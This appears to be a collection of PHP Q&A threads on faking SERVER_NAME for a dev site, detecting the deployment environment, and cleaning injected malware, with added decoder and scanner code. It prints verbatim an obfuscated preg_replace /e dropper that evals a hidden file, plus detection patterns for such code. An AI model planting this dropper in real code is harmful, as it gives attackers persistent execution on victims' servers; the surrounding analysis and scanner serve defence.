Does anyone know if there's a way to send PHP a different $_SERVER['SERVER_NAME'] value to the one that's actually being used to call Apache? i.e.: if the user types dev.mydomain.com in the URL bar of the browser, it arrives at the correct IP address, but tells PHP that the server name is live.mydomain.com? I've Googled around for this, but not found anything.
"Why do I want to do this?" I hear you ask
I've inherited a large PHP system that makes a lot of decisions based on the domain name being used to call the system. The domain name is sometimes hardcoded, and sometimes stored in the database.
I now need to make a development environment separate from the live environment. I could search and replace all those domain names, but I then have different code for the two environments, and problems with the code versioning.
Please note
I don't need the user to hack or fake anything, so there are no security issues. I want, as the site administrator, Apache and PHP to use different domain names.
The following 'solutions' are not what I'm asking
ServerAlias : No. Apache still sends the wrong domain name to the code.
Redirecting : Is only going to send the request to the wrong server.
Hacking the client's hosts file : Sure I can do that on my own machine, but a number of 'technically naive' people without administrator rights on their machines also need to test the development site. And they would need to remember to change it back when done testing. It would become unworkable.
Any ideas please?
After another 3 hours searching on the internet, I eventually found an answer. I'll leave it here for the next person searching how to do this.
First things first. ModRewrite was not the answer! By the time Apache is processing its ModRewrite and SetEnv settings, the SERVER_NAME and 'HTTP_HOST' variables are cast in stone. You can try resetting them, but your PHP won't ever see the changed values.
What does work is PHP's auto_prepend option. How you set this depends on your PHP setup, but the flag is as follows:
auto_prepend_file=prepend.php
Then create the prepend.php file in your document root:
<?php
// Requests that arrived as dev.mydomain.com are presented to the
// application as if they had been made to live.mydomain.com.
if ($_SERVER['HTTP_HOST'] == 'dev.mydomain.com') {
    $_SERVER['HTTP_HOST']   = 'live.mydomain.com';
    $_SERVER['SERVER_NAME'] = 'live.mydomain.com';
}
?>
It even works in Symfony. All you have to do is ensure the prepend.php file stays out of your master repository.
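A variant of that prepend file, added here and not part of the answer above, that keys the rewrite on a value Apache sets for the dev vhost instead of on the client's Host header. If the same php.ini (and therefore the same auto_prepend_file) serves both environments, the rewrite should depend on which vhost answered, not on what the client typed, because HTTP_HOST is simply the Host header the client sent. The APP_ENV variable, the file path and the DEV_REAL_* keys are assumptions for this example.

```php
<?php
// Added example, not the poster's prepend.php. The rewrite is keyed on a
// variable that Apache sets for the dev vhost, so the client-supplied Host
// header alone can no longer trigger it. Assumed dev <VirtualHost> settings:
//
//     SetEnv APP_ENV dev
//     php_value auto_prepend_file /srv/www/dev/prepend.php
//
// mod_php copies SetEnv values into $_SERVER; under php-fpm the equivalent is
// "env[APP_ENV] = dev" in the pool configuration, which getenv() then sees.

$env = isset($_SERVER['APP_ENV']) ? $_SERVER['APP_ENV'] : getenv('APP_ENV');

if ($env === 'dev') {
    // Name the inherited application expects (from the question).
    $pretend = 'live.mydomain.com';

    // Keep the real values reachable for logging and debugging under keys
    // the application does not use (assumed names).
    $_SERVER['DEV_REAL_HTTP_HOST']   = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '';
    $_SERVER['DEV_REAL_SERVER_NAME'] = isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : '';

    // HTTP_HOST may carry a port ("dev.mydomain.com:8080", "[::1]:8080");
    // preserve it so URLs the application builds from HTTP_HOST still reach
    // the dev box rather than the live one.
    $port = '';
    if (isset($_SERVER['HTTP_HOST']) && preg_match('/:(\d+)$/', $_SERVER['HTTP_HOST'], $m)) {
        $port = ':' . $m[1];
    }

    $_SERVER['HTTP_HOST']   = $pretend . $port;
    $_SERVER['SERVER_NAME'] = $pretend;
}
```

With this in place the file can live in the shared include path and stay out of the repository as the answer suggests; on the live vhost, where APP_ENV is not set, it does nothing.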
And then, literally 30 seconds after posting the question, I thought to myself: "Hang on... You haven't tried ModRewrite yet." I'll leave the question here for now. I could get other useful feedback!
Related
For several years, I have been using the approach usually recommended to check whether a page was invoked locally or remotely by inspecting whether $_SERVER['SERVER_ADDR'] equals 127.0.0.1 or is empty. This has been discussed in other questions, such as this and this. Other superglobals such as $_SERVER['REMOTE_ADDR'] are also often mentioned.
Over time, I have found that this approach sometimes seems to fail.
What I really want to know is whether the script has been invoked on my dev server (xampp, wamp, IDE debugger...) or on a production server. This is so that paths to scripts above the web root can be properly set. While this works 99.999% of the time, it seems that sometimes, when Apache redirects to a 404 page, the $_SERVER['SERVER_ADDR'] must be lost, and a script running on a production server passes the "local" test.
As a result, I am looking for other approaches. Of course I may be doing something wrong in Apache, but regardless, it would be good to have a foolproof test in php.
A couple ideas came to me, and I wonder if these are safe, or whether someone has a better idea.
A. One idea is to look at the current path: something like
define('DEV_SERVER',
    substr(strtolower($_SERVER['DOCUMENT_ROOT']), 0, 8) == 'c:/xampp'
);
B. Another idea would be to check for the existence of a local file with a particular name, but hitting the file system seems like too much work.
Thanks in advance for all insights!
You could also try gethostname().
Although the best method is probably to only deploy dev-specific stuff to dev servers, i.e. keep those scripts separate from your production / regression testing scripts. You don't want this DEV-server-specific stuff to accidentally become visible to users.
I am curious if doing something like setting your "environment" to Production, Dev, Staging, etc. based on a domain name such as dev.domain.com, staging.domain.com is a bad idea.
Can somebody just edit their hosts file to point dev.domain.com to domain.com so now the system thinks it's in Dev when it really is in Prod? This would mean any Dev-specific code will be run by a complete stranger.
Is this possible or is there a better way to determine your environment such as setting it manually in a server variable?
For reference, I am using PHP.
I would set the environment in a server variable on the machine. This allows you to control it during deployment and it cannot be mucked around with by people who are not authorized to do so. Although if you are worried about developers inadvertently connecting to production that is a whole other issue. You should be controlling access to production credentials via some other process such as jndi (in the java world) or environment keys replaced at runtime or deploy time (works in any language).
Setting your "environment" to Production, Dev, Staging, etc. based on a domain name is absolutely safe. This is because you have total control over what your domain name is.
BEWARE: do not trust what others make you believe your domain name is. For example, $_SERVER['HTTP_HOST'] is not your domain name. It is the value of the HTTP Host header that the client sent you, and is therefore free to manipulate.
This depends on how you use your domain. Suppose there is domain.com but there are several sub-domains, sub1.domain.com, sub2.domain.com, etc., and every sub-domain is managed by a different user and/or application!
Somehow I have managed to be attacked in a very specific manner on a site I help maintain, and I am looking into whether or not the server was directly hacked or someone was able to inject the malicious script somehow.
First someone managed to get this:
#preg_replace("\x7c\50\x5b\136\x3c\135\x2b\51\x7c\151\x73\145","\x65\166\x61\154\x28\47\x24\142\x66\167\x3d\71\x30\65\x38\67\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x62\146\x77\75\x39\60\x35\70\x37\73","\x4c\62\x35\157\x59\156\x4d\166\x64\62\x56\151\x4c\62\x78\160\x64\155\x55\166\x61\110\x52\153\x62\62\x4e\172\x4c\63\x52\154\x63\63\x51\166\x62\107\x56\62\x5a\127\x77\171\x58\63\x52\154\x63\63\x51\166\x62\107\x39\156\x4c\171\x34\154\x4f\104\x49\64\x52\123\x55\167\x4d\104\x45\172\x4a\125\x49\64\x52\152\x4d\154\x51\153\x4d\170\x51\151\x56\103\x4d\152\x4a\103\x4a\124\x52\107\x4e\124\x63\75");
into the very top of a PHP file right after the file's comments. What this, and most likely other code, did was 301 redirect anyone not connecting to the site through a browser to a payday loan site. This ONLY affected my homepage; all other pages were fine.
There was probably more code to do it, but this was the most confusing part, since this code sits in a file called functions.php which is only ever included; however, IT IS the first file to be included within index.php (my homepage).
It is completely confusing me how someone could have got code there without directly hacking the server; there is no user input used there, it is literally sitting above the entire file. There is nothing there except this injected code and some comments above.
My environment is:
Gentoo
PHP 5.2.14-pl0-gentoo
Apache 2
I have checked server logs however, as usual, they deleted their trail.
This is also partly, as you have noticed, a server question but atm it is 90% programming question so I thought I would ask it here first.
Is there any vulnerability within PHP that could cause this?
If you need clarification let me know.
Edit
I have a staging system which has a
Work
Preview
Live
I know this is nothing to do with SQL injection since if I switch the live and preview folders around I get no problems. I also do not store the Gentoo password within the DB or the app, and you can only connect to the server from a small range of IP addresses, except for Apache, which accepts port 80 and 443 connections from any host. Plus I use SQL escaping classes and methods within the site (PDO, MySQLi etc.).
So this problem (which is even more confusing) is only located within one copy of my site and not the DB or anything.
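The call quoted in the question is obfuscated only by writing every character as a \xHH or octal \NNN escape inside double quotes; PHP's string parser turns those back into plain bytes before preg_replace() ever sees them. The following is an added example, not the poster's code or any answer's, that decodes the three arguments and reports whether the pattern carries the /e modifier. It assumes nothing beyond the injected line itself, which it embeds verbatim, and it executes nothing from the payload.

```php
<?php
// Added example, not the poster's code: decodes the escape-obfuscated
// preg_replace() call quoted above so its three arguments can be read, and
// reports whether the pattern carries the /e modifier (which makes
// preg_replace() eval() the replacement; present in PHP 5.2, removed in 7.0).
// Nothing from the payload is executed.

function analyse_preg_replace_call($snippet)
{
    // Pull out the double-quoted string literals in argument order.
    preg_match_all('/"((?:[^"\\\\]|\\\\.)*)"/', $snippet, $m);
    if (count($m[1]) < 3) {
        return null;
    }

    // \xHH and \NNN inside double quotes follow C conventions, so
    // stripcslashes() yields the bytes the PHP parser would have produced.
    list($pattern, $replacement, $subject) =
        array_map('stripcslashes', array_slice($m[1], 0, 3));
    if ($pattern === '') {
        return null;
    }

    // Modifiers are whatever follows the pattern's closing delimiter.
    $pairs = array('(' => ')', '[' => ']', '{' => '}', '<' => '>');
    $open  = $pattern[0];
    $close = isset($pairs[$open]) ? $pairs[$open] : $open;
    $modifiers = substr($pattern, strrpos($pattern, $close) + 1);

    return array(
        'pattern'         => $pattern,
        'modifiers'       => $modifiers,
        'executes_code'   => strpos($modifiers, 'e') !== false,
        'replacement'     => $replacement,
        'calls_eval'      => preg_match('/\beval\s*\(/', $replacement) === 1,
        'subject'         => $subject,
        // The subject in this sample is base64; decoded for display only.
        'subject_decoded' => base64_decode($subject, true),
    );
}

// The injected line from the question, copied verbatim. Single quotes keep
// the backslash escapes intact so the decoder, not PHP, interprets them.
$injected = '#preg_replace("\x7c\50\x5b\136\x3c\135\x2b\51\x7c\151\x73\145","\x65\166\x61\154\x28\47\x24\142\x66\167\x3d\71\x30\65\x38\67\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x62\146\x77\75\x39\60\x35\70\x37\73","\x4c\62\x35\157\x59\156\x4d\166\x64\62\x56\151\x4c\62\x78\160\x64\155\x55\166\x61\110\x52\153\x62\62\x4e\172\x4c\63\x52\154\x63\63\x51\166\x62\107\x56\62\x5a\127\x77\171\x58\63\x52\154\x63\63\x51\166\x62\107\x39\156\x4c\171\x34\154\x4f\104\x49\64\x52\123\x55\167\x4d\104\x45\172\x4a\125\x49\64\x52\152\x4d\154\x51\153\x4d\170\x51\151\x56\103\x4d\152\x4a\103\x4a\124\x52\107\x4e\124\x63\75");';

$r = analyse_preg_replace_call($injected);
printf("pattern     : %s\n", $r['pattern']);
printf("modifiers   : %s%s\n", $r['modifiers'],
    $r['executes_code'] ? '   <-- /e: replacement is passed to eval()' : '');
printf("replacement : %s\n", $r['replacement']);
printf("subject     : %s\n",
    $r['subject_decoded'] !== false ? $r['subject_decoded'] : $r['subject']);
```

Decoded, the pattern is |([^<]+)|ise, the replacement is eval('$bfw=90587;'.base64_decode(implode("\n",file(base64_decode("\1")))));$bfw=90587; and the subject is a base64-encoded filesystem path. With /e, preg_replace() substitutes the captured subject for \1 and evaluates the replacement as PHP, so this one line reads a second, hidden file at that path, base64-decodes its contents and runs them. That is consistent with the poster seeing only this line in functions.php: the redirect logic itself would sit in the file it loads, so a clean-up that removes only the visible line leaves the dropper's payload on disk.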
Pinpointing this kind of thing is more on the server admin side, I guess. Check the attacker-modified file date, and look for suspicious activity at that date and time in the server's logs (Apache logs, FTP logs, SSH logs maybe). This also may depend on your traffic, log size, and level of access to your server, as it may be prohibitive. If you have any HTML form that uploads files, verify the directory in which the files are stored for PHP shells. Also check the permissions on that directory. If you are on shared hosting, this can also be the result of the attacker injecting a shell on another site, and then attacking yours by that means. In that case contact your hosting company.
There's a 99% chance it's the webserver's fault. SQL injection is one thing, but I don't know, maybe they managed to somehow get your password with SQL injection and then log in to a control panel or FTP, but I'd say it's the webserver.
Ok so I understand how and why now. It was the one thing I thought it would never be: Wordpress.
I was basically a victim of: http://muninn.net/blog/2012/06/a-tale-of-east-asian-history-british-loan-sharks-and-a-russian-hacker.html
Using a tool like: http://www.youtube.com/watch?v=y-Z5-uHvONc
You see, even though my main site is not made with WordPress, it has a WordPress blog located at /blog/, and the hacker was able to use various WordPress vulnerabilities to get around the location problem and plant scripts on any part of the server.
By the way, this actually happened on the latest install of WordPress. Double-checked the version. We are not totally sure exactly when he placed the script (there are multiple instances of the foreign script being placed throughout the years!) but we do know this recent attack must have been sited also quite recently, which puts the latest version (or the version before) under a huge amount of scrutiny.
So a nice note of caution about WordPress there...
I have a public-facing debug script that I would only like to run on certain dev boxes. I was hoping to do this programmatically inside this script, by detecting the server IP or name.
So I have a question about the security of $_SERVER and $_SERVER['HTTP_HOST'] in particular.
From this: http://shiflett.org/blog/2006/mar/server-name-versus-http-host blog post I have gathered that this var is pretty insecure, and can't be trusted.
What is the best way to find out from php what box you are currently on?
I thought of using __FILE__, since that seems to be pretty secure, but I'm not sure I have enough info just from the file path.
I don't necessarily need the server name, even ip would be fine.
thanks in advance.
The best way? It depends on the level of control you have on your environment. Here are some options:
Set an environmental variable via the webserver to indicate the box.
if (getenv('env_server') == 'production')
This is nice, since there's no files that you need to worry about. Just the webserver configuration.
Set a file in a "known" place on the server, and check that (one file for the entire server).
require('/path/to/environment.php');
That file should define a constant to determine the environment.
Manually configure each application for the server. This is the easiest to do, since it doesn't require anything on the server side, but it's also the least convenient since you need to manually configure each install...
External IP address used to get to the site:
$_SERVER['SERVER_ADDR']
This is nice since it requires no additional configuration on the server side. But it will require you to keep a map of all active IP addresses, and the servers they are bound to (especially since more than 1 IP can point to the same server)...
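One function that combines the first, second and fourth options above in order of trust (server-set variable, then a marker file outside the web root, then the bound address) and never consults HTTP_HOST, which the earlier answer about hosts files points out is just the client's Host header. It also covers the failure mode from the "related" question, where SERVER_ADDR was empty on an error-document request, by letting that source decide only on an exact match and otherwise failing closed to production. This is an added example, not code from any answer; the APP_ENV name, the environment.php location, the address map and the debug toggle at the end are assumptions.

```php
<?php
// Added example, not from any answer in this thread. Resolves the deployment
// environment from sources the client cannot influence. $_SERVER['HTTP_HOST']
// is deliberately never consulted.

function detect_environment($server = null)
{
    $server  = ($server === null) ? $_SERVER : $server;
    $allowed = array('development', 'staging', 'production');

    // 1. Variable set by the web server (assumed name APP_ENV). Under mod_php
    //    "SetEnv APP_ENV staging" in the vhost lands in $_SERVER; under
    //    php-fpm use "env[APP_ENV] = staging" in the pool configuration.
    $env = isset($server['APP_ENV']) ? $server['APP_ENV'] : getenv('APP_ENV');
    if ($env !== false && in_array($env, $allowed, true)) {
        return $env;
    }

    // 2. Marker file one level above the document root (assumed path), so it
    //    can be neither served nor overwritten through the site. It is
    //    expected to contain a single statement such as: return 'staging';
    $file = dirname($server['DOCUMENT_ROOT']) . '/environment.php';
    if (is_readable($file)) {
        $env = include $file;
        if (in_array($env, $allowed, true)) {
            return $env;
        }
    }

    // 3. Address the request was accepted on. SERVER_ADDR comes from the
    //    socket, not from a header, but it can be empty (CLI, some error
    //    document paths), so it only decides on an exact match. Assumed map.
    $byAddr = array('127.0.0.1' => 'development', '::1' => 'development');
    if (!empty($server['SERVER_ADDR']) && isset($byAddr[$server['SERVER_ADDR']])) {
        return $byAddr[$server['SERVER_ADDR']];
    }

    // Fail closed: anything unrecognised is treated as production so that
    // debug-only code never switches itself on by accident.
    return 'production';
}

define('APP_ENV', detect_environment());

// Typical consumer: verbose errors and the debug script only off production.
if (APP_ENV !== 'production') {
    ini_set('display_errors', '1');
}
```

The order matters: the two explicit sources are things only someone with deployment access can change, and the address map is the fallback for boxes that were never configured. Because the function returns 'production' for anything it cannot classify, a misconfigured or forged request degrades to the safest behaviour rather than to debug mode.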
The best method is to explicitly define the machine by placing an environment config file on it and checking for it:
if (file_exists('environment.php')) {
include 'environment.php';
}
This file could contain just the name of the machine you're on, or configuration settings like $debug = 0 or whatever else you want to customize for specific machines.
What is the best way to find out from php what box you are currently on?
$_SERVER["SERVER_NAME"] will usually be fine. The security problems Chris outlines need very, very specific circumstances to work.
$_SERVER["SERVER_ADDR"] would be an alternative, too.
Other than that, I would tend to go with __FILE__ if there is any chance of getting a hint from the path.
You could use exec() to run a shell command.
echo exec('hostname');
This can get the IP address on OS X, may be platform specific.
echo exec('ifconfig | grep "inet " | grep -v 127.0.0.1 | cut -d\ -f2');
Like always, just want to say thank you for all of the help and input in advance.
I have a particular site that I am the web developer for and am running into a unique problem. It seems that somehow something is getting into every single PHP file on my site and adding some malware code. I have deleted the code from every page multiple times and changed FTP and DB passwords, but to no avail.
The code that is added looks like this - eval(base64_decode(string)) - which the string is 3024 characters.
Not sure if anyone else has run into this problem or if anyone has ideas on how I can secure my PHP code.
Thanks again.
The server itself could be compromised. Report the problem to your web host. What is their response?
An insecure PHP script coupled with incorrect file permissions could give the attacker the ability to modify your PHP files. To eliminate this possibility I would take the site down, delete all the files, re-upload, then switch permissions on the entire site to deny any writes to the file system.
Edit:
As a short-term fix try asking your web host to disable eval() for your account. If they're worth their salt they should be running Suhosin which has an option to disable eval.
You should use "disable_functions=eval,exec" in your php.ini or .htaccess as first measure.
Yes, I have run into this problem myself. I take it you are on a shared host? Are you perchance on Rackspace Cloud?
This is where I had that problem. The first thing you need to do right away is notify your host; this is a hosting issue, and I suspect the malware has gained access to your server at the FTP level.
Make sure you have nothing chmod 777 (world-writable); if it needs to be writable by your app, make it 775.
Hope this helps, good luck.
You should change the file permissions so that only you can write to those files. 0777 (the default on some hosts, I believe) is just asking for trouble. See File Permissions.
Also, it's advisable to not put any files that aren't supposed to be accessible by URL outside of the public_html folder, for example, config files.
I had a similar problem. However, my problem was that I was running a python code evaluator on my site. As far as I remember you need to use eval() function to execute the python code. In one of my php files I had a weird eval statement. What kind of script are you developing? I mean does it involve evaluation of some other code?
You should also note (assuming you are using a hosting solution to host your site) that it's almost never your fault. An example being that the Network Solutions hosting company recently had a server hacked and over 1K web pages were affected, not due to security holes on each particular site, but due to some bad configuration/monitoring of what was put on that particular server that hosts those sites. If you can't see anything security-wise wrong with your code, i.e. you sanitize everything properly and/or you are running a non-vulnerable version of whatever CMS you are using (if you're using a CMS), then it's probably not an issue with your site, just the server in general.
You should move to another server. It would appear that the attacker has access to the server or is running some code as a background process which is overwriting the files. It may be possible to identify and remove the problem, but smart attackers will hide additional scripts etc to trip you up later.
I've come across viruses that read filezilla conf files.
I SWEAR TO GOD. At first I was: WOW, then I was: mother f*** sneaky b*stards.
Check your pc for viruses.
One of the possible scenarios is that somebody managed to get write access somehow, and changing passwords etc. helped, but he left a PHP file that can still run.
See if there are any unknown files there. Or delete every damn thing and restore some backups.
Get the last modified time of your files, then go over to your access logs (FTP, HTTP whatever's open, if you don't know where they are ask your host) and find out who was mucking around on your system at that time.
Likely the attacker has installed a script that they can call periodically to re-infect any files you fix.
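Several answers above say the same thing in different words: find every file carrying the injection, note when it was last changed, line that time up with the FTP/SSH/HTTP logs, and fix the world-writable permissions that let it happen. The script below, added here and not code posted by anyone in this thread, does the read-only part of that in one pass over a web root. It looks for the eval(base64_decode(...)) shape from this question and for the escape-obfuscated preg_replace() /e dropper from the earlier question on this page, records mtime and ctime per hit, and lists world-writable paths. The signatures, file extensions and command-line usage are assumptions; it modifies nothing.

```php
<?php
// Added example, not code from any answer in this thread. Read-only triage of
// a web root. Assumed usage: php triage.php /var/www/html

$signatures = array(
    // eval(base64_decode("...")) as described in the question
    'eval-base64'     => '/\beval\s*\(\s*base64_decode\s*\(/i',
    // long runs of \xHH / \NNN escapes, the obfuscation used by the
    // preg_replace() dropper quoted earlier on this page
    'escaped-literal' => '/"(?:\\\\x[0-9a-fA-F]{2}|\\\\[0-7]{1,3}){8,}"/',
    // preg_replace() whose pattern literal carries the /e modifier
    // (confirmed after decoding, see scan_file)
    'preg-replace-e'  => '/\bpreg_replace\s*\(\s*"((?:[^"\\\\]|\\\\.)*)"/',
);

// True when the (already decoded) pattern's trailing modifiers include 'e'.
function pattern_has_e_modifier($pattern)
{
    if ($pattern === '') {
        return false;
    }
    $pairs = array('(' => ')', '[' => ']', '{' => '}', '<' => '>');
    $close = isset($pairs[$pattern[0]]) ? $pairs[$pattern[0]] : $pattern[0];
    $end   = strrpos($pattern, $close);
    return $end > 0 && strpos(substr($pattern, $end + 1), 'e') !== false;
}

// Returns a list of "signature at line N" strings for one file.
function scan_file($path, array $signatures)
{
    $src  = file_get_contents($path);
    $hits = array();
    foreach ($signatures as $name => $regex) {
        if (!preg_match_all($regex, $src, $all, PREG_SET_ORDER | PREG_OFFSET_CAPTURE)) {
            continue;
        }
        foreach ($all as $m) {
            // The pattern literal must be decoded before its modifiers can be
            // read; calls without /e are ordinary and are skipped.
            if ($name === 'preg-replace-e' && !pattern_has_e_modifier(stripcslashes($m[1][0]))) {
                continue;
            }
            $line   = substr_count(substr($src, 0, $m[0][1]), "\n") + 1;
            $hits[] = "$name at line $line";
            break; // one report per signature per file is enough for triage
        }
    }
    return $hits;
}

function newest_first($a, $b)
{
    return strcmp($b['mtime'], $a['mtime']);
}

function triage($root, array $signatures)
{
    $report = array('suspicious' => array(), 'world_writable' => array());
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    foreach ($it as $path => $info) {
        // The 0777 / world-writable bit several answers warn about, on
        // directories as well as files.
        if ($info->getPerms() & 0002) {
            $report['world_writable'][] = $path;
        }
        if (!$info->isFile() || !preg_match('/\.(php|phtml|inc)$/i', $path)) {
            continue;
        }
        $hits = scan_file($path, $signatures);
        if ($hits) {
            $report['suspicious'][] = array(
                'path'  => $path,
                // mtime can be reset with touch(); ctime cannot be set from
                // userland, so disagreement between the two is itself a signal.
                'mtime' => date('Y-m-d H:i:s', $info->getMTime()),
                'ctime' => date('Y-m-d H:i:s', $info->getCTime()),
                'hits'  => $hits,
            );
        }
    }
    // Newest modification first: that is the time window to search in the logs.
    usort($report['suspicious'], 'newest_first');
    return $report;
}

$root   = isset($argv[1]) ? $argv[1] : '.';
$report = triage($root, $signatures);
foreach ($report['suspicious'] as $f) {
    printf("mtime %s  ctime %s  %s  [%s]\n", $f['mtime'], $f['ctime'], $f['path'], implode(', ', $f['hits']));
}
foreach ($report['world_writable'] as $p) {
    echo "world-writable: $p\n";
}
```

Two caveats on the fixes suggested above. disable_functions cannot switch off eval(), because eval is a language construct rather than a function; it was Suhosin's suhosin.executor.disable_eval that did that. And disable_functions is a PHP_INI_SYSTEM setting, so it only takes effect from php.ini or the server configuration, not from .htaccess. Neither changes the advice that matters most here: if a re-infection script is present, every file the scanner flags has to be removed in the same pass, and the writable paths closed, or the cleaned files come back.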